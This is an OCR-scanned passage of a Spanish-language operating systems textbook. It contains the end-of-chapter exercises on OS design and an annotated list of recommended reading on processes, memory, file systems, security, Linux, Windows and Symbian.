vas tendencias y cumplir con nuevos retos. Éstos pueden serlos sistemas basados en hipervisor, los 
sistemas multinúcleo, los espacios de direcciones de 64 bits, la conectividad masiva, los multipro- 
cesadoresy las multicomputadorasdegran escala, la multimedia, las computadoras inalámbricas de 
bolsillo, los sistemas embebidos y los nodos de monitoreo. Los próximos años serán momentos 
emocionantes para los diseñadores de sistemas operativos. 


PROBLEMAS 

1. La Ley de M oore describe un fenómeno de crecimiento exponencial, similar al crecimiento de 
la población de una especie animal que se introduce en un nuevo entorno con comida abundan¬ 
te y sin enemigos naturales. En la naturaleza, es probable que una curva de crecimiento expo- 
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nencial se convierta, en un momento dado, en una curva sigmoidecon un límite asintótico cuan¬ 
do las provisiones de alimentos se empiecen a agotar o los depredadores aprovechen las nuevas 
presas. A nalice algunos factores que pueden limitar en un momento dado la proporción de me¬ 
jora del hardw/are de computadora. 

2. En la figura 13-1 se muestran dos paradigmas: algorítmico y controlado por eventos. Para cada 
uno de los siguientes tipos de programas, indique cuál paradigma puede ser el más fácil de usar: 

a) Un compilador. 

b) U n programa de edición de fotografías. 

c) Un programa de nómina. 

3. En algunas de las primeras computadoras M acintosh de Apple, el código de la GUI estaba en 
ROM. ¿Por qué? 

4. El dictamen de Corbató es que el sistema debe proporcionar un mecanismo mínimo. He aquí 
una lista de llamadas POSIX que también estaban presentes en UNIX versión 7. ¿Cuáles son 
redundantes? Es decir, ¿cuáles se podrían eliminar sin perder la funcionalidad, debido a que las 
combinaciones simples de otras llamadas podrían realizar la misma tarea con un rendimiento 
casi igual? Access, alarm, chdir, chmod, chown, chroot, cióse, creat, dup, exec, exit, fcntl, 
fork, fstat, ioctl, kill, link, Iseek, mkdir, mknod, open, pause, pipe, read, stat, time, ti¬ 
mes, umask, unlink, utime, wait y write. 

5. En un sistema cliente-servidor basado en microkernel, éste realiza sólo el paso de mensajes y 
nada más. ¿Es posible que los procesos de usuario de todas formas puedan crear y utilizar se¬ 
máforos? De ser así, ¿por qué? Si no es así, ¿por qué no? 

6 . La optimización cuidadosa puede mejorar el rendimiento de las llamadas al sistema. Considere 
el caso en el que se realiza una llamada al sistema cada 10 mseg. El tiempo promedio de una 
llamada es de 2 mseg. Si las llamadas al sistema se pueden agilizar mediante un factor de dos, 
¿cuánto tiempo tardaría ahora un proceso que antes tardaba 10 segundos en ejecutarse? 

7. M uestre un breve análisis de comparación entre mecanismo y directiva, en el contexto de las 
tiendas de ventas al detalle. 

8 . A menudo, los sistemas operativos realizan la asignación de nombres en dos niveles distintos: 
externo e interno. Indique cuáles son las diferencias entre estos nombres con respecto a: 

a) Longitud 

b) Unicidad 

c) jerarquías 

9. U na manera de manejar tablas cuyo tamaño no se conoce de antemano es hacerlas fijas, pero 
cuando se llene una hay que reemplazarla con una más grande, copiar las entradas anteriores a 
la nueva tabla y después liberar la tabla anterior. ¿Cuáles son las ventajas y desventajas de ha¬ 
cer la nueva tabla 2 veces más grande que la original, en comparación con hacerla sólo 1.5 ve¬ 
ces más grande? 

10. En la figura 13-5 se utilizó una bandera llamada encontró para indicar si se había localizado el 
PID. ¿Hubiera sido posible olvidarse de encontró y sólo evaluar p al final del ciclo, para ver si 
llegó al final o no? 
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11. En la figura 13-6, las diferencias entre el Pentium y el U ItraSPARC se ocultan debido a la com¬ 
pilación condicional. ¿Se podría utilizar el mismo método para ocultar la diferencia entre los 
Pentium con un disco IDE como el único disco, y los Pentium con un disco SCSI como el últi¬ 
mo disco? ¿Sería una buena idea? 

12. La indirección es una forma de hacer un algoritmo más flexible. ¿Acaso tiene desventajas, y de 
ser así, cuáles son? 

13. ¿Pueden los procedimientos reentrantes tener variables globales estáticas privadas? A nalice su 
respuesta. 

14. La macro de la figura 13-7(b) es sin duda mucho más eficiente que el procedimiento de la figu¬ 
ra 13-7(a). Sin embargo, una desventaja es su dificultad para leerlo. ¿Hay otras desventajas? De 
ser así, ¿cuáles son? 

15. Suponga que necesitamos una forma de calcular si el número de bits en una palabra de 32 bits 
es par o impar. Idee un algoritmo para realizar este cálculo lo más rápido que sea posible. Pue¬ 
de usar hasta 256 KB de RAM para las tablas si es necesario. Escriba una macro para llevar a 
cabo su algoritmo. Crédito adicional: escriba un procedimiento para realizar el cálculo al iterar 
a través de los 32 bits. M ida cuántas veces es más rápida su macro que el procedimiento. 

16. En la figura 13-8, vimos cómo los archivos GIF utilizan valores de 8 bits para indexar en una 
paleta de colores. La misma idea se puede utilizar con una paleta de colores de 16 bits de an¬ 
cho. ¿Bajo qué circunstancias, si las hay, podría una paleta de colores de 24 bits ser una buena 
idea? 

17. Una desventaja de GIF es que la imagen debe incluir la paleta de colores, lo cual incrementa el 
tamaño del archivo. ¿Cuál es el tamaño de imagen mínimo para que haya un punto de equili¬ 
brio en una paleta de colores de 8 bits de ancho? Ahora repita esta pregunta para una paleta de 
colores de 16 bits de ancho. 

18. En el texto mostramos cómo los nombres de rutas en la caché pueden producir una agilización 
considerable al buscar nombres de rutas. Otra técnica que se utiliza algunas veces es tener un 
programa demonio que abra todos los archivos en el directorio raíz y los mantenga abiertos de 
manera permanente, para poder obligar a sus nodos-i a estar en memoria todo el tiempo. ¿M e- 
jora más la búsqueda de la ruta si se inmovilizan los nodos-i de esta forma? 

19. Incluso si un archivo remoto no se ha eliminado desde que se registró una ocurrencia, puede ha¬ 
ber cambiado desde la última vez que se referenció. ¿Qué otra información podía haber sido útil 
registrar? 

20. Considere un sistema que acumula las referencias a los archivos remotos como sugerencias: por 
ejemplo, como (nombre, host-remoto, nombre-remoto). Es posible que un archivo remoto se 
elimine en forma silenciosa y se reemplace. Así, la sugerencia puede obtener el archivo equivo¬ 
cado. ¿Cómo se puede hacer para que este problema ocurra con menos frecuencia? 

21. En el texto se afirma que, a menudo, la localidad se puede explotar para mejorar el rendimien¬ 
to. Pero considere un caso en donde el programa lee la entrada de un origen y envía su salida 
en forma continua a dos o más archivos. ¿Puede un intento de aprovechar la localidad en el sis¬ 
tema de archivos producir una disminución en la eficiencia en este caso? ¿Hay una forma de re¬ 
solver esto? 
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22. Fred Brooks afirma que un programador puede escribir 1000 iíneas de código depurado por año, 
e inciuso así, ia primera versión de M INIX (13,000 iíneas de código) fue producida por una per¬ 
sona en menos de tres años. ¿Cómo puede expiicar esta discrepancia? 

23. Utiiice ia cifra de Brooks de 1000 iíneas de código por programador ai año para hacer una es¬ 
timación deia cantidad de dinero que se requirió para producir Windows Vista. Suponga que un 
programador cuesta 100,000 dóiares por año (inciuyendo costos como ias computadoras, ei 
espacio de oficina, ei soporte secretariai y ia sobrecarga administrativa). ¿Cree usted en esta res¬ 
puesta? Si no es así, ¿qué podría estar mai? 

24. A medida que ia memoria cada vez se hace más económica, podríamos imaginar una compu¬ 
tadora con una gran cantidad de RAM operada por baterías en vez de un disco duro. Con ios 
precios actuaies, ¿cuánto costaría una PC de bajo rendimiento que sóio utiiice RAM ? Suponga 
que es suficiente con un disco de 1 GB de RAM para una máquina de bajo rendimiento. ¿Es 
probabie que esta máquina sea competitiva? 

25. N ombre aigunas características de un sistema operativo convencionai que no sean necesarias en 
un sistema embebido que se utiiice dentro de un aparato eiectrodoméstico. 

26. Escriba un procedimiento en C para reaiizar una suma de dobie precisión con dos parámetros 
dados. Escriba ei procedimiento utiiizando ia compiiación condicionai de tai forma que funcio¬ 
ne en máquinas de 16 bits y también en máquinas de 32 bits. 

27. Escriba programas que introduzcan cadenas cortas generadas ai azar en un arregio, y que des¬ 
pués pueda buscar en ei arregio una cadena específica mediante ei uso de (a) una búsqueda ii- 
neai simpie (fuerza bruta) y (b) un método más sofisticado de su eiección. Vueiva a compiiar 
sus programas para tamaños de arregios que varíen de pequeño a grande, según io que usted 
pueda manejar en su sistema. Evaiúe ei rendimiento de ambos métodos. ¿En dónde está ei pun¬ 
to de equiiibrio? 

28. Escriba un programa para simuiar un sistema de archivos en memoria. 
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En los 13 capítulos anteriores vimos una amplia variedad de temas. Este capítulo tiene la Intención 
de servir como guía para los lectores Interesados en continuar su estudio de los sistemas operativos. 
La sección 14.1 es una lista de lecturas recomendadas: la 14.2, una bibliografía ordenada alfabéti¬ 
camente de todos los libros y artículos citados en esta obra. 

Además de las referencias antes mencionadas, el Simposio de la ACM sobre Principios de Sis¬ 
temas Operativos (SOSP) que se lleva a cabo en años Impares y el Simposio de USEN IX sobre Di¬ 
seño e Implementaclón de Sistemas Operativos (OSDI) que se lleva a cabo en años pares son buenas 
fuentes sobre el trabajo en curso en los sistemas operativos. La Conferencia Eurosys 200x se lleva 
a cabo cada año y es también una fuente de artículos de primera clase. Además, AC M Transactlons 
on Computer Systems y ACM SIGOPS Operating Systems Review son dos publicaciones que a me¬ 
nudo tienen artículos relevantes. M uchas otras conferencias delaACM,el IEEE ydeUSENIX tra¬ 
tan sobre temas especializados. 


14.1 SUGERENCIAS PARA CONTINUAR LA LECTURA 

En las siguientes secciones proporcionaremos al lector algunas sugerencias para continuar su lectu¬ 
ra. A diferencia de los artículos citados en las secciones tituladas "INVESTIGACIÓN SOBRE ..." 
en el libro, que tratan sobre la Investigación actual, estas referencias son en su mayor parte de na¬ 
turaleza Introductoria o de tutoría. Sin embargo, pueden servir para presentar el material que con¬ 
tiene este libro desde una perspectiva distinta o con un énfasis diferente. 
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14.1.1 I ntroducción y obras generales 

Silberschatz y colaboradores, Operating Systems Concepts with J ava, 7a. edición. 

Un iibro de texto generai sobre sistemas operativos. Habia sobre procesos, administración de 
memoria, administración dei aimacenamiento, protección y seguridad, sistemas distribuidos y aigu- 
nos sistemas de propósito especiai. Se muestran dos casos de estudio: Linux y Windows XP. La por¬ 
tada presenta muchos dinosaurios (io que no está ciaro es qué tienen que ver ios dinosaurios con ios 
sistemas operativos). 


Staiiings, Operating Systems, 5a. edición 

Otro iibro de texto sobre sistemas operativos. Abarca todos ios temas tradicionaies, además de 
inciuir una pequeña cantidad de material sobre sistemas distribuidos. 


Stevensy Rago, Advanced Programming in the UNIX Environment 

Este libro indica cómo escribir programas en C que utilicen la interfaz de llamadas al sistema 
de UNIX y la biblioteca estándar de C. Los ejemplos se basan en la versión 4 de System V y en la 
versión 4.4BSD de UNIX. La relación de estas implementaciones con POSIX se describe con de¬ 
talle. 


Tanenbaum y Woodhull, "Operating Systems Design and ImpIementadon" 

Una manera práctica de aprender sobre los sistemas operativos. Este libro describe los princi¬ 
pios usuales y además analiza el sistema operativo real MINIX 3 con gran detalle. Contiene un lis¬ 
tado de ese sistema como un apéndice. 


14.1.2 Procesóse hilos 

A ndrews y Schneider, "Concepts and N otations for Concurrent Programming" 

Un tutorial y una encuesta sobre los procesos y la comunicación entre procesos, incluyendo: 
ocupado en espera, semáforos, monitores, paso de mensajes y otras técnicas. El artículo también 
muestra cómo se incrustan estos conceptos en varios lenguajes de programación. Es antiguo, pero 
ha soportado la prueba del tiempo muy bien. 


Ben-Ari, Principies of Concurrent Programming 

Este pequeño libro está dedicado por completo a los problemas de la comunicación entre pro¬ 
cesos. Fl ay capítulos sobre exclusión mutua, semáforos, monitores y el problema de la cena de fi¬ 
lósofos, entre otros. 


Silberschatz y colaboradores, Operating System Concepts with j ava, 7a. edición 

Los capítulos del 4 al 6 tratan sobre los procesos y la comunicación entre procesos, incluyen¬ 
do planificación, secciones críticas, semáforos, monitores y problemas clásicos de comunicación 
entre procesos. 
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14.1.3 Administración de la memoria 

Denning, "Virtual Memory" 

Un artículo clásico sobre muchos aspectos de la memoria virtual. Denning fue uno de los pio¬ 
neros en este campo e inventor del concepto de conjunto de trabajo. 


Denning, "Working Sets Past and Present" 

U na buena descripción general de los diversos algoritmos de administración de memoria y pa¬ 
ginación. Se incluye una bibliografía extensa. Aunque muchos de los artículos son viejos, en reali¬ 
dad los principios no han cambiado nada. 


K nuth, The Art of Computer Programming, vol. 1 

En este libro se analizan y comparan los algoritmos del primer ajuste, del mejor ajuste y otros 
algoritmos de memoria. 

Silberschatz y colaboradores, Operating System Concepts with j ava, 7a. edición 

Los capítulos 8 y 9 tratan sobre la administración de la memoria, incluyendo intercambio, pa¬ 
ginación y segmentación. Se menciona una variedad de algoritmos de paginación. 

14.1.4 Entrada/salida 

Geisty Daniel, "A Continuum of Disk Scheduling Algorithms" 

Se presenta un algoritmo generalizado de planificación del brazo del disco. Se muestran mu¬ 
chos resultados de simulaciones y experimentos. 


Scheible, "A Survey of Storage Options" 

Hay muchas formas de almacenar bits en estos días: DRAM , SRAM , SD RAM , memoria flash, 
disco duro, disco flexible, CD-ROM , DVD y cinta, por mencionar unas cuantas. En este artículo se 
estudian las diversas tecnologías, y se resaltan sus fortalezas y debilidades. 


Stan y Skadron, "Power-Aware Computing" 

Hasta que alguien logre aplicar la Ley de Moore en las baterías, el uso de la energía seguirá 
siendo uno de los principales problemas en los dispositivos móviles. Incluso tal vez necesitemos 
sistemas operativos conscientes de la temperatura mucho antes de ello. En este artículo se estudian 
algunas de las cuestiones y sirve como introducción para otros cinco artículos en esta edición espe¬ 
cial de la revista Computer sobre la computación consciente de la energía. 


Waikery Cragon, "Interrupt Processing in Concurrent Processors" 

La implementadón de interrupciones precisas en computadoras superescalares es una activi¬ 
dad retadora. El truco es señalizar el estado y hacerlo con rapidez. Aquí se analizan varias de las 
cuestiones de diseño y los sacrificios. 
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14.1.5 Sistemas de archivos 

M cKusick y colaboradores, "A Fast File System for UNIX" 

El sistema de archivos de UNIX se rediseñó por completo para 4.2 BSD. En este artículo se 
describe el diseño del nuevo sistema de archivos, con un énfasis sobre su rendimiento. 

Silberschatz y colaboradores, Operating System Concepts with J ava, 7a. edición 

Los capítulos 10 y 11 tratan sobre sistemas de archivos. Cubren las operaciones de archivos, 
los métodos de acceso, directorios e implementación, entre otros temas. 

Stallings, Operating Systems, 5a. edición 

El capítulo 12 contiene una buena cantidad de material sobre el entorno de seguridad, en espe¬ 
cial sobre los hackers, virus y otras amenazas. 

14.1.6 I nterbioqueos 

Coffman y colaboradores, "System Deadlocks" 

Una breve introducción a los interbloqueos, cuáles son sus causas y cómo se pueden evitar o 
detectar. 

Flolt, "Some Deadlock Properties of Computer Systems" 

Un análisis sobre los interbloqueos. Flolt introduce un modelo de gratos dirigido, que se pue¬ 
de utilizar para analizar ciertas situaciones de interbloqueo. 

Isloor y M arsiand, "The Deadlock Probiem: An OverView" 

Un tutorial sobre interbloqueos, con un énfasis especial en los sistemas de bases de datos. Se 
cubre una variedad de modelos y algoritmos. 

Shub, "A Unified Treatment of Deadlock" 

Este breve tutorial sintetiza las causas y soluciones délos interbloqueos, y sugiere lo que se de¬ 
be enfatizar al enseñar este tema a los estudiantes. 

14.1.7 Sistemas operativos multimedia 

Lee, "Parallel Video Servers: A Tutorial" 

M uchas organizaciones desean ofrecer video bajo demanda, lo cual crea la necesidad de tener 
servidores de video paralelos, tolerantes a fallasy escaladles. Aquí se tratan las principales cuestio¬ 
nes sobre cómo crearlos, incluyendo la arquitectura del servidor, el uso de bandas de disco, las di¬ 
rectivas de colocación, el balanceo de cargas, la redundancia, los protocolos y la sincronización. 

Lesliey colaboradores, "The Design and ImpIementadon of an Operating System to Support Dis- 
tributed M ulti media Applications" 

M uchos de los intentos de impiementar multimedia se han basado en agregar características a 
un sistema operativo existente. Un método alternativo es empezar todo de nuevo, como se describe 
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aquí, y crear un sistema operativo para muitimedia desde cero, sin necesidad de que sea compatibie 
con nada anterior. Ei resuitado es un diseño bastante distinto ai de ios sistemas convencionaies. 

Sitaram y Dan, "M uitimedia Servers" 

Los servidores muitimedia tienen muchas diferencias en comparación con ios servidores de ar¬ 
chivos reguiares. Los autores anaiizan ias diferencias con detaiie, en especiai en ias áreas de ia pia- 
nificación, ei subsistema de aimacenamiento y ei uso de caché. 


14.1.8 Sistemas con varios procesadores 

Ahmad, "Gigantic, Ciusters: WhereAreThey and WhatAreThey Doing?" 

Este es un buen iugar para darse una idea de ias muiticomputadoras grandes más avanzadas. 
Describe i a idea y muestra ias generaiidades de aigunos de ios sistemas más grandes que se encuen¬ 
tran en operación en ia actuaiidad. Dado ei funcionamiento de ia iey de M oore, es razonabie decir 
que ios tamaños que se mencionan aquí se dupiicarán aproximadamente cada 2 años. 

Duboisy coiaboradores, "Synchronization, Coherence, and Event Ordering in M uitiprocessors" 

Un tutoriai sobre ia sincronización en ios sistemas mu i ti procesadores de memoria compartida. 
A igunas de ias ideas se apiican de iguai forma a ios sistemas de un soio procesador y memoria dis¬ 
tribuida. 

Geer, "For Programmers, M uiticore Chips M ean M uitipie Chaiienges" 

Los chips muiticore están aquí, estén o no iistos ios programadores de software. Como ha re¬ 
suitado ser, no están iistos y en consecuencia, ia programación de estos chips presenta muchos de¬ 
safíos, desde obtener ias herramientas adecuadas hasta dividir ei trabajo en pequeñas piezas y 
probar ios resuitados. 

Kant y M ohapatra, "Internet Data Centers" 

Los centros de datos de Internet son muiticomputadoras masivas con asteroides. A menudo 
contienen decenas de cientos o miies de computadoras, ias cuaies trabajan en una soia apiicación. 
Aquí, ia escaiabiiidad, ei mantenimiento y ei uso de ia energía son cuestiones importantes. Este ar- 
tícuio forma una introducción ai tema y presenta cuatro artícuios adicionaies sobre ei mismo. 

Kumar y coiaboradores, "Heterogeneous Chip M uitiprocessors" 

Los chips muitinúcieo que se utiiizan en ias computadoras de escritorio son simétricos: todos 
ios núcieos son idénticos. Sin embargo, en aigunas apiicaciones ios CM Ps heterogéneos se utiiizan 
mucho, con núcieos para cáicuios, decodificación de video, de audio, etcétera. En este artícuio se 
anaiizan ciertas cuestiones reiacionadas con ios CM Ps heterogéneos. 

Kwok y Ahmad, "Static Scheduiing Aigorithms for Aiiocating Directed Task Graphs to M uitipro¬ 
cessors" 

La pianificación de tareas óptima de una muiticomputadora o muitiprocesador es posibie cuan¬ 
do se conocen ias características de todos ios trabajos de antemano. Ei probiema es que ia pianifi¬ 
cación óptima requiere mucho tiempo para caicuiarse. En este artícuio, ios autores anaiizan y 
comparan 27 aigoritmos conocidos para atacar este probiema de distintas formas. 
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Rosenblum y Garfinkel, "Virtual M achine M onitors: CurrentTechnology and FutureTrends" 

Este artículo empieza con una historia de los monitores de máquinas virtuales, y después ana¬ 
liza el estado actual déla CPU, la memoria y la virtual izad ón déla E/S. En especial, trata áreas pro¬ 
blemáticas relacionadas con estos tres elementos y la forma en que el hardware futuro puede aliviar 
los problemas. 


Whitaker y colaboradores, "Rethinking the Design of Virtual M achine M onitors" 

La mayoría de las computadoras tienen algunos aspectos estrambóticos y difíciles de virtuali- 
zar. En este artículo, los autores del sistema Denali hablan sóbrela paravirtualización; es decir, cam¬ 
biar los sistemas operativos huéspedes para evitar utilizar las características extrañas, de manera 
que no haya necesidad de emularlas. 


14.1.9 Seguridad 

Bratus, "What Hackers Learn Thatthe Rest of Us Don’t" 

¿Qué hace a los hackers diferentes? ¿Qué es lo que a ellos les preocupa y a los programadores 
regulares no? ¿Tienen distintas posturas en cuanto a lasAPIs? ¿Son importantes los casos angula¬ 
res? ¿Tiene curiosidad el lector? Léalo. 


Computer, febrero de 2000 

El tema de esta edición de Computer es la biométrica, con seis artículos sobre el tema. Varían 
desde una introducción al tema, pasando por varias tecnologías específicas, hasta un artículo que 
trata sobre las cuestiones legales y de privacidad. 


Denning, Information Warfare and Security 

La información se ha convertido en un arma tanto militar como corporativa. Los participantes 
no sólo tratan de atacar los sistemas de información del enemigo, sino también de proteger los pro¬ 
pios. En este fascinante libro, el autor cubre cada tema concebible en relación con la estrategia de 
ofensiva y defensiva, desde la estafa de datos hasta los husmeadores de paquetes. U na lectura defi¬ 
nitiva para cualquiera que esté realmente interesado en la seguridad de las computadoras. 


Ford y A lien, "Flow Notto BeSeen" 

Los virus, el spyware, los rootkits y los sistemas de administración de derechos digitales tie¬ 
nen un gran interés en ocultar cosas. Este artículo presenta una breve introducción al sigilo en sus 
diversas formas. 


Hafnery Markoff, Cyberpunk 

El reportero del New York Times que hizo pública la historia del gusano de Internet (M arkoff) 
relata aquí tres historias absorbentes de jóvenes hackers que irrumpen en las computadoras en todo 
el mundo. 

Johnson y jajodia, "Exploring Steganography: Seeing the Unseen" 
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La esteganografía tiene una larga historia, que se remonta a los días cuando el escritor debía 
rapar la cabeza de un mensajero, tatuar un mensaje en la cabeza rasurada y enviarlo después de que 
le creciera otra vez el cabello. A unque con frecuencia las técnicas actuales son espeluznantes, tam¬ 
bién son digitales. Para una introducción detallada al tema como se practica en la actualidad, este 
artículo es el lugar adecuado para empezar. 


Ludwig, The Littie Black Book of Email Viruses 

Si desea escribir software antivirus y necesita comprender la forma en que funcionan los virus 
hasta el nivel de los bits, este libro es para usted. Cada uno de los tipos de virus se analiza de ma¬ 
nera extensiva y se proporciona el código de muchos de ellos. Sin embargo, es requisito tener un 
profundo conocimiento de programación con lenguaje ensamblador en el Pentium. 


M ead, "Who is Liable for Insecure Systems?" 

Aunque la mayor parte del trabajo en la seguridad de las computadoras se maneja desde una 
perspectiva técnica, no es la única. Suponga que los distribuidores de software fueran legal mente 
responsables por los daños ocasionados por su software fallido. ¿Cabe la probabilidad de que los 
distribuidores pusieran mucho más atención a la seguridad de la que ponen en la actualidad? ¿Le 
intriga esta idea? Lea este artículo. 

M ilojicic, "Security and Privacy" 

La seguridad tiene muchas facetas, incluyendo los sistemas operativos, las redes, las implica¬ 
ciones para la privacidad y mucho más. En este artículo se entrevista a seis expertos en seguridad, 
en cuanto a lo que piensan sobre el tema. 

N achenberg, "C omputer V i rus-A nti vi rus C oevol uti on" 

Tan pronto como los desarrolladores de antivirus descubren una forma de detectar y neutrali¬ 
zar cierta clase de virus de computadora, los desarrolladores de los mismos se adelantan y lo mejo¬ 
ran. Aquí se analiza el juego del gato y el ratón entre las partes virus-antivirus. El autor no es 
optimista en cuanto a que los escritores de antivirus sean los que ganarán la guerra: malas noticias 
para los usuarios de computadoras. 

Pfleeger, Security in Computing, 4a. edición 

Aunque se ha publicado una variedad de libros sobre seguridad de computadoras, la mayoría 
de ellos sólo tratan la seguridad délas redes. Este libro hace eso, pero también incluye capítulos so¬ 
bre la seguridad de los sistemas operativos, de las bases de datos y de los sistemas distribuidos. 

Sasse, "Red-Eye Blink, Bendy Shuffie, and theYuck Factor: A User Experience of Biometric Air- 
port Systems" 

El autor habla sobre sus experiencias con el sistema de reconocimiento de iris que se utiliza en 
muchos aeropuertos grandes. No todos los resultados son positivos. 

Thibadeau, "Trusted Computing for Disk Orives and Other Peripherals" 

Si usted creía que un disco duro era sólo un lugar en donde se almacenaban los bits, está equi¬ 
vocado. U na unidad de disco duro moderna tiene una poderosa CPU, megabytes de RA M, varios ca- 
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nales de comunicación e inciuso su propia ROM de inicio. En resumen, es un sistema computacio- 
nai compieto a punto de sufrir ataques y que necesita su propio sistema de protección. Este artícuio 
anai iza ei proceso de proteger ei disco duro. 

14.1.10 Linux 

Bovet y Cesad, U nderstanding the Linux Kernei 

Tai vez este iibro sea ei mejor anáiisis generai dei kernei de Linux. Trata ios procesos, ia ad¬ 
ministración de ia memoria, ios sistemas de archivos, ias señaies y mucho más. 

IEEE, Information Technoiogy—Portabie Operating System Interface (POSIX), Part 1: System Ap- 
piication Program Interface (API) [C Language] 

Éste es el estándar. Algunas partes son muy legibles, en especial el anexo B, "Rationale and 
Notes", que a menudo explica por qué las cosas se hacen de cierta manera. Una ventaja de hacer re¬ 
ferencia al documento de los estándares es que, por definición, no hay errores. Si se escabulle un 
error tipográfico en el nombre de una macro por el proceso de edición, ya no se considera un error; 
es oficial. 

Fusco, The Linux Programmers' Toolbox 

Este libro describe cómo usar Linux para el usuario intermedio, alguien que conozca los fun¬ 
damentos y desee empezar a explorar cómo funcionan los diversos programas de Linux. Está diri¬ 
gido a los programadores de C. 

M axweil, Linux Core Kernei Commentary 

Las primeras 400 páginas de este libro contienen un subconjunto del código del kernei de Li¬ 
nux. Las últimas 150 páginas consisten en comentarios sobre el código, algo muy parecido al esti¬ 
lo del libro clásico de John Lions (1996). Si desea comprender el kernei de Linux con todos sus 
gloriosos detalles, este es el lugar apropiado para empezar, pero tenga cuidado: leer 40,000 líneas 
de C no es recomendable para cualquier persona. 

14.1.11 Windows Vista 

Cusumano y Selby, "Flow M icrosoft Builds Software" 

¿Alguna vez se ha preguntado cómo podría alguien escribir un programa con 29 millones de 
líneas (como Windows 2000) y lograr que funcione? Para averiguar cómo se utiliza el ciclo de crea¬ 
ción y prueba de M icrosoft para administrar proyectos de software muy grandes, dé un vistazo a es¬ 
te artículo. El procedimiento es bastante instructivo. 

Rector y Newcomer, Win32 Programming 

Si busca uno de esos libros de 1500 páginas que ofrecen un resumen sobre cómo escribir pro¬ 
gramas de Windows, este es un buen principio. Trata sobre las ventanas, los dispositivos, la sali¬ 
da gráfica, la entrada mediante el teclado y el ratón, las impresoras, la administración de 
memoria, las bibliotecas y la sincronización, entre muchos otros temas. Requiere un conocimien¬ 
to de C o C + -F. 
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Russinovich y Solomon, M icrosoft Windows Internáis, 4a. edición 

Si desea aprender a utilizar Windows, hay cientos de libros publicados. Si desea conocer el 
funcionamiento interno de Windows, este libro es la mejor opción. Cubre muchos algoritmos in¬ 
ternos y estructuras de datos, y con un detalle técnico considerable. Ningún otro libro se le ase¬ 
meja. 


14.1.12 El sistema operativo Symbian 

Cingue y colaboradores, "How Do M obile Phones Fail? A Failure Data Analysis of Symbian OS 
Smart Phones" 

Antes solía ser el caso de que mientras las computadoras fallaban a diestra y siniestra, por lo 
menos los teléfonos funcionaban. A hora que los teléfonos son simplemente computadoras con pe¬ 
queñas pantallas... y también fallan debido software defectuoso. Este artículo analiza los errores 
de software que han provocado fallas en los teléfonos y dispositivos de bolsillo que utilizan Sym¬ 
bian. 


M orris, The Symbian OS Architecture Sourcebook 

Si busca información mucho más detallada sobre el sistema operativo Symbian, este es un buen 
lugar para empezar. Trata sobre la arquitectura de Symbian y todos los niveles, con una buena can¬ 
tidad de detalles y algunos casos de estudio. 

Stichbury y Jacobs, The Accredited Symbian Developer Primer 

Si está interesado en lo que necesita saber para desarrollar aplicaciones para los teléfonos y 
PDAscon Symbian, este libro empieza con una introducción al lenguaje necesario (C-f-f) y después 
pasa a la estructura del sistema, el sistema de archivos, las redes, las cadenas de herramientas y la 
compatibilidad. 


14.1.13 Principios de diseño 

Brooks, The Mythical M an M onth: Essays on Software Engineering 

F red B rooks fue uno de los diseñadores del sistema operativo OS/360 de IB M . A prendió de la 
manera difícil qué funciona y qué no. Los consejos que ofrece en este libro ingenioso, divertido e 
informativo son tan válidos ahora como hace un cuarto de siglo, cuando los escribió por primera 
vez. 


Cookey colaboradores, "UNIX and Beyond: An Interview with Ken Thompson" 

Diseñar un sistema operativo es más un arte que una ciencia. En consecuencia, escuchar a los 
expertos en el campo es una buena manera de aprender sobre el tema. N o hay muchos expertos con 
más experiencia que Ken Thompson, co-diseñador de UNIX, Inferno y Plan 9. En esta amplia en¬ 
trevista, Thompson muestra sus pensamientos acerca de dónde provenimos y hacia dónde vamos en 
este campo. 
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Corbató, "On Building SystemsThatWill Fail" 

En su conferencia por el Premio Turing, el padre del tiempo compartido trata muchas de las 
mismas preocupaciones que B rooks en The M ythical M an-M onth. Su conclusión es que todos los 
sistemas complejos fallarán en última instancia, y que para tener alguna probabilidad de éxito es 
esencial evitar la complejidad y esforzarse por la simplicidad y elegancia en el diseño. 


Crowley, Operating Systems: A Design-Oriented Approach 

La mayoría de los libros de texto sobre sistemas operativos describen sólo los conceptos bási¬ 
cos (procesos y memoria virtual, por ejemplo) y unos cuantos ejemplos, pero no dicen nada sobre 
cómo diseñar un sistema operativo. Este libro es único, ya que dedica cuatro capítulos al tema. 


Lampson, "El intsfor Computer System Design" 

Butler Lampson, uno de los principales diseñadores en el mundo de sistemas operativos inno¬ 
vadores, ha recolectado muchos tips, sugerencias y lineamientos en sus años de experiencia y los 
reunió en este entretenido e informativo artículo. Al igual que el libro de Brooks, ésta es una lectu¬ 
ra obligatoria para cualquier aspirante a diseñador de sistemas operativos. 


Wirth, "A PleaforLean Software" 

Nikiaus Wirth, un famoso y experimentado diseñador de sistemas, argumenta sobre el softwa¬ 
re simplificado y eficiente con base en unos cuantos conceptos simples, en vez del gran desorden 
que representa la mayoría del software comercial. Para expresar su opinión analiza su sistema O be- 
ron, un sistema operativo orientado a redes y basado en GUI que cabe en 200 KB, incluyendo el 
compilador de Oberon y el editor de texto. 
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